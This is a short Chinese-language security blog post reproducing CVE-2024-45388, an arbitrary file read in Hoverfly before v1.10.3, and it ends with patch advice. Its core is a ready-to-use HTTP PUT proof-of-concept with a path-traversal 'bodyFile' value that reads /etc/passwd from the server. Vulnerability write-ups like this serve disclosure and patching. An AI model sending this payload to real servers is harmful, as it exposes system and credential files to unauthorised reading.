wxvl/doc/2024-10/【成功复现】SpectoLabs hoverfly任意文件读取漏洞(CVE-2024-45388).md

【成功复现】SpectoLabs hoverfly任意文件读取漏洞(CVE-2024-45388)

弥天安全实验室 弥天安全实验室 2024-10-14 18:44

网安引领时代，弥天点亮未来   

 

0x00写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！
0x01漏洞介绍Hoverfly是SpectoLabs开源的一种轻量级的开源 API 模拟工具。Hoverfly v1.10.3之前版本存在安全漏洞。攻击者利用该漏洞可以从服务器读取任意文件。0x02影响版本github.com/spectolabs/hoverfly<1.10.3github.com/SpectoLabs/hoverfly<1.10.30x03漏洞复现
1.访问漏洞环境

漏洞poc

PUT /api/v2/simulation HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Connection: close
Content-Length: 137
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

{"data":{"pairs":[{"request":{},"response":{"bodyFile": "../../../../../../../etc/passwd","x":"aaa"}} ]},"meta":{"schemaVersion":"v5.3"}}

0x04修复建议目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://github.com/SpectoLabs/hoverfly/releases/tag/v1.10.3弥天简介学海浩茫，予以风动，必降弥天之润！弥天安全实验室成立于2019年2月19日，主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子，也是民间组织。主要以技术共享、交流等不断赋能自己，赋能安全圈，为网络安全发展贡献自己的微薄之力。口号 网安引领时代，弥天点亮未来 知识分享完了喜欢别忘了关注我们哦~学海浩茫，予以风动，必降弥天之润！   弥  天安全实验室